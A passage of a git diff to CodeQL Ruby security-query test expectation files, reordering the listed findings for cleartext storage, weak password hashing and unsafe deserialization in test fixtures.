"083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | +| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | +| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | +| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | +| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | +| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | +| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | +| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected index 30e754c63d0d..0ad72554019f 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected @@ -1,11 +1,3 @@ -#select -| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | -| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | -| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | -| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | edges | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:6:1:6:1 | x | provenance | | | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | provenance | | @@ -26,3 +18,11 @@ nodes | weak_hashing.rb:30:25:30:38 | password_param | semmle.label | password_param | | weak_hashing.rb:32:25:32:38 | password_param | semmle.label | password_param | subpaths +#select +| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | +| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | +| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | +| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected index 9d220826b1cd..44f54744e4b1 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected @@ -1,5 +1,3 @@ -#select -| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | edges | OjGlobalOptions.rb:13:5:13:13 | json_data | OjGlobalOptions.rb:14:22:14:30 | json_data | provenance | | | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:13:17:13:28 | ...[...] | provenance | | @@ -10,3 +8,5 @@ nodes | OjGlobalOptions.rb:13:17:13:28 | ...[...] | semmle.label | ...[...] | | OjGlobalOptions.rb:14:22:14:30 | json_data | semmle.label | json_data | subpaths +#select +| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected index a7fd344d2865..4fa7c85df052 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected @@ -1,5 +1,3 @@ -#select -| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | edges | OxGlobalOptions.rb:6:5:6:12 | xml_data | OxGlobalOptions.rb:7:22:7:29 | xml_data | provenance | | | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:6:16:6:27 | ...[...] | provenance | | @@ -10,3 +8,5 @@ nodes | OxGlobalOptions.rb:6:16:6:27 | ...[...] | semmle.label | ...[...] | | OxGlobalOptions.rb:7:22:7:29 | xml_data | semmle.label | xml_data | subpaths +#select +| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected index b20b5e8b30e6..b99b2e7c7810 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected @@ -1,31 +1,3 @@ -#select -| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | -| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | -| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | -| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | -| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | -| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | -| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | edges | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | provenance | | | UnsafeDeserialization.rb:11:23:11:50 | call to decode64 | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | provenance | | @@ -157,3 +129,31 @@ nodes | UnsafeDeserialization.rb:170:24:170:27 | call to gets | semmle.label | call to gets | | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | semmle.label | call to readlines | subpaths +#select +| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | +| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | +| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | +| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | +| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | +| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | +| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | 